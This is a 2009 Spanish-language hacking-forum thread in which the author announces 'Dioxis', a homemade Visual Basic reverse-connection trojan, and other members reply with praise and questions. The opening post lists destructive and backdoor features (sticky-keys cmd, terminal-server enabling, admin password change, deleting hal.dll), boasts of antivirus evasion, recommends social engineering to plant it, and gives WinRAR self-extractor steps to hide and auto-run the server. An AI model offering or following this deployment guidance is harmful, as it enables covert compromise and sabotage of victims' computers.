elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [Vb] Dioxis: Conexion Inversa by 50l3r
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: [Vb] Dioxis: Conexion Inversa by 50l3r  (Leído 25,594 veces)
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
[Vb] Dioxis: Conexion Inversa by 50l3r
« en: 22 Mayo 2009, 18:09 pm »


Abstenganse Virustotal ;)


Tamaño servidor: 408 KB (Compilado con Winsck.ocx & dioxis.exe(servidor))
Tamaño Cliente: 544 KB
Archivos: Cliente Dioxis y libreria winsck.ocx
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: 666
Infraestructura: Red Local e internet


Funciones automatizadas:

Ejecucion de:

  • Paint
  • Teclado Universal
  • Buscaminas
  • Solitario
  • Pinball
  • Calculadora
  • Paseo de Win Xp
  • Star Wars
  • Mensajes personalizados
  • Paginas Web

Matanza de Procesos:


  • Messenger
  • Navegadores (Firefox,Iexplorer,Safari y Opera)
  • Explorador de Windows
  • Proceso Personalizado

Creacion de Puertas Traseras:

  • Habilitar terminal server
  • Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
  • Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

  • Edicion de la contraseña de administracion a la que se quiera
  • Cierre de Sesion
  • Apagar Pc
  • ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )



¿Que es Dioxis?

Dioxis, a pesar de su simple interfaz, es un troyano de conexion inversa.

Utiliza la funcion shell, para ejecutar acciones, estas acciones estan divididas en 4 partes:

Modo Custom: Es el modo personalizado, si tienes ya conocimientos de lo que puedes hacer con "Ejecutar:" puedes escribir tus ordenes aqui para que sean procesadas en el ordenador remoto

Modo Funny: Es el modo divetido ^^. Puedes haces acciones tales como ejecutar paint, mandar mensajes, ponerle la tipica pelicula de star wars en modo ascii...etc


Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod


Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc

He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P


Demostracion

Aqui os dejo unos minutos de la demostracion del troyano, es la 1 version, no la actualizada, pero no cambia mucho


¿Detectado?

El unico antivirus que hasta ahora me ha dado algun problema es el poco conocido avira, que lo detecta por heuristica pero te deja seguir trabajando con el, asi que si tienes una buena ingenieria social, podras colarselo, a continuacion los antivirus pasados:

Kapersky 2009



Nod32



Norton 2009



Panda global protection 2009



Avast

En este no tengo imagen, ya que nada mas analizarlo la ventana se cierra

Por ahora esos antivirus son con los que lo analize, si deseais que lo analize con otros me comentais

Otros Datos:

  • Añadida la funcion de eliminar Servidor y crearlo con el cliente
  • Ahora el tiempo de reconexion se configura al crear el server, igual que la ip
  • No hará falta conectarse y desconectarse al pasar entre modos[/b]

Instrucciones:

El Troyano consta de cliente y servidor, el servidor se crea con el cliente, y puede que necesite de la libreria de winsock (viene adjuntada con el software), asi que una vez creado el server seguid estos pasos:

1: Instalar el WINRAR y coged los archivos servidor y la libreria

2: Una vez tenemos el servidor y la libreria, cogemos los dos y con el winrar y le damos a añadir archivo, nos aparecera una ventana asi:


Le dais a crear archivo ejecutable o en mi caso a create sfx archive, el metodo de compresion que sea el mejor

3: A continuacion vete a la pestaña avanzado, te aparecerá esta ventana:


te vas a opciones de autoejecutable o sfx options

4: Te volvera a salir otra pestaña para poder decir el directorio en donde se instalara, y que se ejcutara antes o despues de la extraccion, rellenar segun la imagen


5: En la pestaña modos, selecciona segun la imagen, sobreescribir archivos y esconder todo


6: En esta pestaña podreis cambiar el icono de la aplicacion, luego das a aceptar todo y ya tendreis vuestro server








Descargar codigo fuente

« Última modificación: 24 Mayo 2009, 22:13 pm por 50l3r » En línea

braulio--
Wiki

Desconectado Desconectado

Mensajes: 896


Imagen recursiva


Ver Perfil WWW
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #1 en: 22 Mayo 2009, 22:17 pm »

Te felicito, al final lo has conseguido. :)
En línea

50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #2 en: 22 Mayo 2009, 22:20 pm »

yeah, me costo pero si, aun asi me falta mejorarle unas cosas ya que cuando se descoencta el servidor, el cliente no muestra la desconexion, fallo grave
En línea

Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.836



Ver Perfil
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #3 en: 22 Mayo 2009, 22:55 pm »

No lo he provado, pero que tu interfaz mola mola!, y esta bien xhio esto Modo Dioxis XD
En línea

https://www.latotatv.com
Código:
La Tota TV
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #4 en: 22 Mayo 2009, 22:58 pm »

 :D

Buen curro!

Me gusta la interfaz... como se llama el Oso Rosa ese? ;D

Lo que no me gusta es que cada vez que cambias de sección has de escuchar... porque? :xD

Bueno, ahora preguntas especificas:
  • Peso del Stub?
  • Espacio entre cada reintento de conexión al cliente?
  • Lenguaje? VB6.0?

Sigue así, llegarás lejos ;)

Saludos ;D

PD: Para la próxima pon algún TextBox más :xD, Me refiero para preguntar,por ejemplo, el proceso a ser eliminado, no solo los que tengan los botones ;)
« Última modificación: 22 Mayo 2009, 23:01 pm por Karcrack » En línea

50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #5 en: 22 Mayo 2009, 23:03 pm »

si te refieres al numero de fichero que necesita, pues nada mas el server y el ocx del winsock para el que no lo tenga, esta compilado con el winrar jaja

El espacio es de 10 segundos, esta hecho con un timer pero vamos que se puede agrandar si el numero de clientes es elevado

si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno


a mi tampoco me gusta lo de que se reconecta todo el rato, porque como son diferentes formularios tuve que hacer diferentes controles winsock para cada uno, eso no sabia como arreglarlo ains

el oso rosa asesion es el famoso gloomy miren jeje:

http://images.google.es/images?client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hl=es&q=gloomy&btnG=Buscar+im%C3%A1genes&gbv=2&aq=f&oq=

porcierto puse una duda en vb6, quiero que el cliente genere el servidor, es decir que puedas cambiar la ip a la que va el servidor para que no todas vayan a m dominio no-ip, sino que la gente lo use para ellos, haber si me podeis ayudar y cuando acabe eso lo pongo

solucionado el error de que cuando el usuario se descnecta, no avisaba
« Última modificación: 22 Mayo 2009, 23:21 pm por 50l3r » En línea

Myth.ck


Desconectado Desconectado

Mensajes: 303


Algorithmics & C++ Studient


Ver Perfil
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #6 en: 22 Mayo 2009, 23:31 pm »

si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno

Nunca pensé que vb podía llegar a ser tan peligroso junto a tus manos.  :o Congratulations! ;-)
En línea

Un intelectual es un hombre que usa más palabras de las necesarias para decir más cosas de las que sabe.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #7 en: 22 Mayo 2009, 23:38 pm »

Lo de la versión del VB no sobraba, ya que esta VB .NET :P

Cuando digo Peso me refiero a los KB que ocupa... si va todo empacado con WinRar... seran unos 20kb? :-\

 ;)

si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno

Nunca pensé que vb podía llegar a ser tan peligroso junto a tus manos.  :o Congratulations! ;-)
Cualquier persona con un mínimo de dedicación puede hacer lo que se plantee en casi cualquier lenguaje :)
« Última modificación: 22 Mayo 2009, 23:46 pm por Karcrack » En línea

Myth.ck


Desconectado Desconectado

Mensajes: 303


Algorithmics & C++ Studient


Ver Perfil
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #8 en: 22 Mayo 2009, 23:43 pm »

 ;) Ahora queda corroborado que a vb no hay que menospreciarlo...
En línea

Un intelectual es un hombre que usa más palabras de las necesarias para decir más cosas de las que sabe.
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: [Vb] Dioxis: Conexion Inversa by 50l3r
« Respuesta #9 en: 22 Mayo 2009, 23:52 pm »

batch tambien es menospreciado, y solo estamos hablando de batch, hay gente que hace juegos convoy a poner mas datos del software, entre ellos el peso y demas
En línea

Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines